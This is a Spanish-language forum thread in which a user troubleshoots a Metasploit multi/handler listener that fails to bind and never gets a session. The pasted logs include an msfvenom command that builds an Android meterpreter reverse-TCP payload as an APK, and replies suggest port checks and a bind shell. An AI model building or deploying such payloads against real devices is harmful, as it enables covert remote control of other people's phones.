Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: pae en Marzo 12, 2021, 06:10:13 PM

Título: Exploit completed, but no session was created.
Publicado por: pae en Marzo 12, 2021, 06:10:13 PM
Buenas gente, estaba instentando poner el msf en modo escucha pro me sale que no me podrian ayudar

Código (bash) [Seleccionar]
┌──(whitehat㉿hat)-[~]
└─$ msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.100.16
lhost => 192.168.100.16
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.100.16:4444
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[-] Handler failed to bind to 192.168.100.16:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).

msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[-] Handler failed to bind to 192.168.100.16:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.100.16
lhost => 192.168.100.16
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set lport 4554
lport => 4554
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started reverse TCP handler on 192.168.100.16:4554
msf6 exploit(multi/handler) > run
[-] Handler failed to bind to 192.168.100.16:4554:-  -                                                             
[-] Handler failed to bind to 0.0.0.0:4554:-  -                                                                     
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4554).
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >


Título: Re: Exploit completed, but no session was created.
Publicado por: blood_rec en Marzo 12, 2021, 06:26:48 PM
trata de usar otro puerto por ejemplo

SET LPORT 4445

antes de eso verifica que servicio  esta usando ese puerto con

netstat -anpl | grep :4444
Título: Re: Exploit completed, but no session was created.
Publicado por: pae en Marzo 13, 2021, 06:31:08 PM
Me sigue saliendo igual he probado en otro puerto y me sale el mismo problema
Primero verifique no hubiese nada en el puerto
Código (bash) [Seleccionar]
┌──(whitehat㉿hat)-[~]
└─$ ifconfig
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 336  bytes 28724 (28.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 336  bytes 28724 (28.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.43.144  netmask 255.255.255.0  broadcast 192.168.43.255
        inet6 fe80::a9f:5366:4ad:d47c  prefixlen 64  scopeid 0x20<link>
        ether 80:30:49:a5:82:bb  txqueuelen 1000  (Ethernet)
        RX packets 9145  bytes 4328671 (4.1 MiB)
        RX errors 0  dropped 1  overruns 0  frame 0
        TX packets 3517  bytes 519089 (506.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                                                                   
┌──(whitehat㉿hat)-[~]
└─$ netstat -anpl | grep :4895
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
                                                                                                                   
┌──(whitehat㉿hat)-[~]
└─$ sudo su                                                                                                     1 ⨯
[sudo] password for whitehat:
┌──(root💀hat)-[/home/whitehat]
└─# netstat -anpl | grep :4895

                                                                                                                   
┌──(root💀hat)-[/home/whitehat]
└─#                             


Despues:....

Código (bash) [Seleccionar]
┌──(root💀hat)-[/home/whitehat]
└─# msfconsole                                                               
                                                 
               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:                               
                                :::::::+:
                      Metasploit

       =[ metasploit v6.0.33-dev                          ]
+ -- --=[ 2102 exploits - 1134 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Metasploit can be configured at startup, see
msfconsole --help to learn more

msf6 > msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.144  lport=4895 R > /home/whitehat/Escritorio/apli.apk
[*] exec: msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.144  lport=4895 R > /home/whitehat/Escritorio/apli.apk

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10191 bytes
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.43.144
lhost => 192.168.43.144
msf6 exploit(multi/handler) > set lport 4895
lport => 4895
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.43.144:4895
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[-] Handler failed to bind to 192.168.43.144:4895:-  -
[-] Handler failed to bind to 0.0.0.0:4895:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4895).
msf6 exploit(multi/handler) >
Título: Re: Exploit completed, but no session was created.
Publicado por: AXCESS en Marzo 13, 2021, 06:36:08 PM
Está seguro que el exploit avala?

Una de las razones de no crear sesión es precisamente que no avala porque la vulnerabilidad no aplica. Que todo no es mala configuración.
Título: Re: Exploit completed, but no session was created.
Publicado por: sadfud en Abril 11, 2021, 05:26:43 AM
Puede ser por el fw de la máquina objetivo. Prueba con bind shell

Enviado desde mi POCOPHONE F1 mediante Tapatalk